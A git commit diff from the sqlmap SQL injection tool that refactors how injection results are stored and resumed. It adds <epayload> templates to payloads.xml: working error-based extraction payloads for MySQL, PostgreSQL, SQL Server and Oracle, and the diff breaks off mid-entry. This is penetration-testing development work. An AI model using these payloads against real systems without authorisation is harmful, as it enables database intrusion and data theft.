Added tag <epayload> to the payloads.xml's <test> tag to define which payload to use when exploiting the test type.

Removed some useless tests.
Moved <error> from queries.xml to payloads.xml as it makes more sense.
Beeps at sql inj found only if --beep is provided.
Minor fix in order to be able to pickle advancedDict() objects.
Minor code refactoring.
Removed useless folders.
This commit is contained in:
Bernardo Damele 2010-12-01 17:09:52 +00:00
parent c00ea7f5e5
commit 089c16a1b8
11 changed files with 187 additions and 288 deletions

View File

@ -33,6 +33,7 @@ from lib.core.datatype import injectionDict
from lib.core.enums import HTTPMETHOD from lib.core.enums import HTTPMETHOD
from lib.core.enums import NULLCONNECTION from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.exception import sqlmapConnectionException from lib.core.exception import sqlmapConnectionException
from lib.core.exception import sqlmapGenericException from lib.core.exception import sqlmapGenericException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import sqlmapNoneDataException
@ -331,14 +332,28 @@ def checkSqlInjection(place, parameter, value):
# Feed with the boundaries details only the first time a # Feed with the boundaries details only the first time a
# test has been successful # test has been successful
if injection.place is None or injection.parameter is None: if injection.place is None or injection.parameter is None:
if place == PLACE.UA:
injection.parameter = conf.agent
else:
injection.parameter = parameter
injection.place = place injection.place = place
injection.parameter = parameter
injection.ptype = ptype injection.ptype = ptype
injection.prefix = prefix injection.prefix = prefix
injection.suffix = suffix injection.suffix = suffix
if "epayload" in test:
epayload = "%s%s" % (test.epayload, comment)
else:
epayload = None
# Feed with test details every time a test is successful # Feed with test details every time a test is successful
injection.data[stype] = (title, agent.removePayloadDelimiters(reqPayload, False), where, comment) injection.data[stype] = advancedDict()
injection.data[stype].title = title
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False)
injection.data[stype].where = where
injection.data[stype].epayload = epayload
injection.data[stype].comment = comment
if "details" in test: if "details" in test:
for detailKey, detailValue in test.details.items(): for detailKey, detailValue in test.details.items():
@ -351,7 +366,8 @@ def checkSqlInjection(place, parameter, value):
elif detailKey == "os" and injection.os is None: elif detailKey == "os" and injection.os is None:
injection.os = detailValue injection.os = detailValue
beep() if conf.beep:
beep()
# There is no need to perform this test for other # There is no need to perform this test for other
# <where> tags # <where> tags
@ -703,7 +719,6 @@ def checkConnection(suppressOutput=False):
try: try:
page, _ = Request.queryPage(content=True) page, _ = Request.queryPage(content=True)
conf.seqMatcher.set_seq1(page) conf.seqMatcher.set_seq1(page)
except sqlmapConnectionException, errMsg: except sqlmapConnectionException, errMsg:
errMsg = getUnicode(errMsg) errMsg = getUnicode(errMsg)
raise sqlmapConnectionException, errMsg raise sqlmapConnectionException, errMsg

View File

@ -107,10 +107,9 @@ def __formatInjection(inj):
data += "Parameter: %s\n" % inj.parameter data += "Parameter: %s\n" % inj.parameter
for stype, sdata in inj.data.items(): for stype, sdata in inj.data.items():
stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype
data += " Type: %s\n" % stype data += " Type: %s\n" % stype
data += " Title: %s\n" % sdata[0] data += " Title: %s\n" % sdata.title
data += " Payload: %s\n\n" % sdata[1] data += " Payload: %s\n\n" % sdata.payload
return data return data
@ -136,7 +135,7 @@ def __saveToSessionFile():
parameter = inj.parameter parameter = inj.parameter
for stype, sdata in inj.data.items(): for stype, sdata in inj.data.items():
payload = sdata[1] payload = sdata.payload
if stype == 1: if stype == 1:
kb.booleanTest = payload kb.booleanTest = payload
@ -303,7 +302,8 @@ def start():
# TODO: consider the following line in __setRequestParams() # TODO: consider the following line in __setRequestParams()
__testableParameters = True __testableParameters = True
if not kb.injection.place or not kb.injection.parameter: if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
and (kb.injection.place is None or kb.injection.parameter is None):
if not conf.string and not conf.regexp and not conf.eRegexp: if not conf.string and not conf.regexp and not conf.eRegexp:
# NOTE: this is not needed anymore, leaving only to display # NOTE: this is not needed anymore, leaving only to display
# a warning message to the user in case the page is not stable # a warning message to the user in case the page is not stable
@ -394,7 +394,7 @@ def start():
__showInjections() __showInjections()
__selectInjection() __selectInjection()
if kb.injection.place and kb.injection.parameter: if kb.injection.place is not None and kb.injection.parameter is not None:
if conf.multipleTargets: if conf.multipleTargets:
message = "do you want to exploit this SQL injection? [Y/n] " message = "do you want to exploit this SQL injection? [Y/n] "
exploit = readInput(message, default="Y") exploit = readInput(message, default="Y")

View File

@ -158,6 +158,9 @@ class Agent:
return string return string
def cleanupPayload(self, payload): def cleanupPayload(self, payload):
if payload is None:
return
randInt = randomInt() randInt = randomInt()
randInt1 = randomInt() randInt1 = randomInt()
randStr = randomStr() randStr = randomStr()

View File

@ -37,7 +37,7 @@ class advancedDict(dict):
try: try:
return self.__getitem__(item) return self.__getitem__(item)
except KeyError: except KeyError:
raise sqlmapDataException, "Unable to access item '%s'" % item raise sqlmapDataException, "unable to access item '%s'" % item
def __setattr__(self, item, value): def __setattr__(self, item, value):
""" """
@ -56,6 +56,12 @@ class advancedDict(dict):
else: else:
self.__setitem__(item, value) self.__setitem__(item, value)
def __getstate__(self):
return self.__dict__
def __setstate__(self, dict):
self.__dict__ = dict
def injectionDict(): def injectionDict():
injection = advancedDict() injection = advancedDict()

View File

@ -12,6 +12,8 @@ import re
from lib.core.common import dataToSessionFile from lib.core.common import dataToSessionFile
from lib.core.common import formatFingerprintString from lib.core.common import formatFingerprintString
from lib.core.common import readInput from lib.core.common import readInput
from lib.core.convert import base64pickle
from lib.core.convert import base64unpickle
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
@ -78,30 +80,15 @@ def setInjection(inj):
session file. session file.
""" """
if inj.place == PLACE.UA:
inj.parameter = conf.agent
condition = ( condition = (
( not kb.resumedQueries ( not kb.resumedQueries
or ( kb.resumedQueries.has_key(conf.url) and or ( kb.resumedQueries.has_key(conf.url) and
( not kb.resumedQueries[conf.url].has_key("Injection point") not kb.resumedQueries[conf.url].has_key("Injection data")
or not kb.resumedQueries[conf.url].has_key("Injection parameter") ) )
) ) )
) )
if condition: if condition:
dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.place)) dataToSessionFile("[%s][%s][%s][Injection data][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), base64pickle(inj)))
dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.parameter))
dataToSessionFile("[%s][%s][%s][Injection parameter type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.PARAMETER[inj.ptype]))
dataToSessionFile("[%s][%s][%s][Injection prefix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.prefix))
dataToSessionFile("[%s][%s][%s][Injection suffix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.suffix))
for stype, sdata in inj.data.items():
dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.SQLINJECTION[stype]))
dataToSessionFile("[%s][%s][%s][Injection title][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[0]))
dataToSessionFile("[%s][%s][%s][Injection payload][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[1]))
dataToSessionFile("[%s][%s][%s][Injection where][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[2]))
dataToSessionFile("[%s][%s][%s][Injection comment][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[3]))
def setDbms(dbms): def setDbms(dbms):
""" """
@ -370,96 +357,11 @@ def resumeConfKb(expression, url, value):
except ValueError: except ValueError:
pass pass
elif expression == "Injection point" and url == conf.url: elif expression == "Injection data" and url == conf.url:
injPlace = value[:-1] injection = base64unpickle(value[:-1])
kb.injections.append(injection)
logMsg = "resuming injection point '%s' from session file" % injPlace logMsg = "resuming injection data"
logger.info(logMsg)
if not conf.paramDict.has_key(injPlace):
warnMsg = "none of the parameters you provided "
warnMsg += "matches the resumable injection point. "
warnMsg += "sqlmap is going to reidentify the "
warnMsg += "injectable point"
logger.warn(warnMsg)
else:
if kb.injection.place is not None and kb.injection.parameter is not None:
kb.injections.append(kb.injection)
kb.injection = injectionDict()
kb.injection.place = injPlace
elif expression == "Injection parameter" and url == conf.url:
injParameter = unSafeFormatString(value[:-1])
logMsg = "resuming injection parameter '%s' from session file" % injParameter
logger.info(logMsg)
condition = (
not conf.paramDict.has_key(kb.injection.place) or
not conf.paramDict[kb.injection.place].has_key(injParameter)
)
if condition:
warnMsg = "none of the parameters you provided "
warnMsg += "matches the resumable injection parameter. "
warnMsg += "sqlmap is going to reidentify the "
warnMsg += "injectable point"
logger.warn(warnMsg)
else:
kb.injection.parameter = injParameter
elif expression == "Injection parameter type" and url == conf.url:
kb.injection.ptype = unSafeFormatString(value[:-1])
logMsg = "resuming injection parameter type '%s' from session file" % kb.injection.ptype
logger.info(logMsg)
elif expression == "Injection prefix" and url == conf.url:
kb.injection.prefix = unSafeFormatString(value[:-1])
logMsg = "resuming injection prefix '%s' from session file" % kb.injection.prefix
logger.info(logMsg)
elif expression == "Injection suffix" and url == conf.url:
kb.injection.suffix = unSafeFormatString(value[:-1])
logMsg = "resuming injection suffix '%s' from session file" % kb.injection.suffix
logger.info(logMsg)
elif expression == "Injection type" and url == conf.url:
stype = unSafeFormatString(value[:-1])
kb.injection.data[stype] = []
logMsg = "resuming injection type '%s' from session file" % stype
logger.info(logMsg)
elif expression == "Injection title" and url == conf.url:
title = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(title)
logMsg = "resuming injection title '%s' from session file" % title
logger.info(logMsg)
elif expression == "Injection payload" and url == conf.url:
payload = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(payload)
logMsg = "resuming injection payload '%s' from session file" % payload
logger.info(logMsg)
elif expression == "Injection where" and url == conf.url:
where = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(where)
logMsg = "resuming injection where '%s' from session file" % where
logger.info(logMsg)
elif expression == "Injection comment" and url == conf.url:
comment = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(comment)
logMsg = "resuming injection comment '%s' from session file" % comment
logger.info(logMsg) logger.info(logMsg)
elif expression == "Boolean-based blind injection" and url == conf.url: elif expression == "Boolean-based blind injection" and url == conf.url:

View File

@ -14,6 +14,9 @@ from lib.core.data import paths
from lib.core.datatype import advancedDict from lib.core.datatype import advancedDict
def cleanupVals(values, tag): def cleanupVals(values, tag):
if isinstance(values, basestring):
return values
count = 0 count = 0
for value in values: for value in values:
@ -48,7 +51,7 @@ def parseXmlNode(node):
for child in element.getchildren(): for child in element.getchildren():
if child.text and child.text.strip(): if child.text and child.text.strip():
values = cleanupVals(child.text.split(','), child.tag) values = cleanupVals(child.text.split(',') if child.tag != "epayload" else child.text, child.tag)
test[child.tag] = values test[child.tag] = values
else: else:
if len(child.getchildren()) == 0: if len(child.getchildren()) == 0:

View File

@ -401,8 +401,8 @@ def goStacked(expression, silent=False):
return direct(expression), None return direct(expression), None
comment = queries[kb.dbms].comment.query comment = queries[kb.dbms].comment.query
query = agent.prefixQuery("; %s" % expression) query = agent.prefixQuery("; %s" % expression)
query = agent.suffixQuery("%s;%s" % (query, comment)) query = agent.suffixQuery("%s;%s" % (query, comment))
debugMsg = "query: %s" % query debugMsg = "query: %s" % query
logger.debug(debugMsg) logger.debug(debugMsg)
@ -412,7 +412,7 @@ def goStacked(expression, silent=False):
return payload, page return payload, page
def goError(expression, suppressOutput=False, returnPayload=False): def goError(expression, suppressOutput=False):
""" """
Retrieve the output of a SQL query taking advantage of an error-based Retrieve the output of a SQL query taking advantage of an error-based
SQL injection vulnerability on the affected parameter. SQL injection vulnerability on the affected parameter.
@ -436,10 +436,8 @@ def goError(expression, suppressOutput=False, returnPayload=False):
result = resume(expression, None) result = resume(expression, None)
if not result: if not result:
result = errorUse(expression, returnPayload) result = errorUse(expression)
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
if not returnPayload:
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
if suppressOutput: if suppressOutput:
conf.verbose = popValue() conf.verbose = popValue()

View File

@ -28,45 +28,37 @@ from lib.utils.resume import resume
from lib.core.settings import ERROR_SPACE from lib.core.settings import ERROR_SPACE
from lib.core.settings import ERROR_EMPTY_CHAR from lib.core.settings import ERROR_EMPTY_CHAR
def errorUse(expression, returnPayload=False): def errorUse(expression):
""" """
Retrieve the output of a SQL query taking advantage of an error SQL Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter. injection vulnerability on the affected parameter.
""" """
output = None output = None
logic = conf.logic randInt = randomInt(1)
randInt = randomInt(1) query = agent.cleanupPayload(kb.injection.data[2].epayload)
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query) query = agent.prefixQuery(query)
query = agent.suffixQuery(query) query = agent.suffixQuery(query)
startLimiter = "" check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
endLimiter = ""
expressionUnescaped = expression expressionUnescaped = expression
if kb.dbmsDetected: _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
if kb.dbms == DBMS.MYSQL: if kb.dbms == DBMS.MYSQL:
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row' nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionUnescaped = unescaper.unescape(expressionReplaced) expression = safeStringFormat(query, expression)
startLimiter = unescaper.unescape("'%s'" % kb.misc.start) expression = unescaper.unescape(expression)
endLimiter = unescaper.unescape("'%s'" % kb.misc.stop)
else:
expressionUnescaped = kb.misc.handler.unescape(expression)
startLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.start)
endLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter)) debugMsg = "query: %s" % expression
debugMsg = "query: %s" % forgedQuery
logger.debug(debugMsg) logger.debug(debugMsg)
payload = agent.payload(newValue=forgedQuery) payload = agent.payload(newValue=expression)
result = Request.queryPage(payload, content=True) reqBody, _ = Request.queryPage(payload, content=True)
match = re.search('%s(?P<result>.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE) match = re.search(check, reqBody, re.DOTALL | re.IGNORECASE)
if match: if match:
output = match.group('result') output = match.group('result')
@ -78,7 +70,4 @@ def errorUse(expression, returnPayload=False):
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True) infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
logger.info(infoMsg) logger.info(infoMsg)
if returnPayload: return output
return output, payload
else:
return output

View File

@ -1,10 +0,0 @@
#!/usr/bin/env python
"""
$Id$
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
pass

View File

@ -126,6 +126,9 @@ Tag: <test>
original value to its negative representation original value to its negative representation
3: Replace the parameter original value 3: Replace the parameter original value
Sub-tag: <epayload>
The payload that will be used to exploit the injection point.
Sub-tag: <request> Sub-tag: <request>
What to inject for this test. What to inject for this test.
@ -187,6 +190,7 @@ Formats:
<risk></risk> <risk></risk>
<clause></clause> <clause></clause>
<where></where> <where></where>
<epayload></epayload>
<request> <request>
<payload></payload> <payload></payload>
<comment></comment> <comment></comment>
@ -403,6 +407,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>AND [RANDNUM]=[RANDNUM]</payload> <payload>AND [RANDNUM]=[RANDNUM]</payload>
</request> </request>
@ -418,6 +423,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR [RANDNUM]=[RANDNUM]</payload>
</request> </request>
@ -436,6 +442,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -455,6 +462,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -473,6 +481,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -491,6 +500,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
@ -511,6 +521,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
</request> </request>
@ -526,6 +537,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -545,6 +557,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -563,6 +576,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -581,6 +595,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
@ -601,6 +616,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
</request> </request>
@ -619,6 +635,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
<request> <request>
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request> </request>
@ -638,6 +655,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
<request> <request>
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload> <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request> </request>
@ -656,6 +674,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
<request> <request>
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload> <payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request> </request>
@ -674,6 +693,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
<request> <request>
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload> <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request> </request>
@ -699,6 +719,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
<request> <request>
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request> </request>
@ -718,6 +739,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
<request> <request>
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload> <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request> </request>
@ -736,6 +758,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
<request> <request>
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload> <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request> </request>
@ -754,6 +777,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
<request> <request>
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload> <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request> </request>
@ -772,6 +796,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
<request> <request>
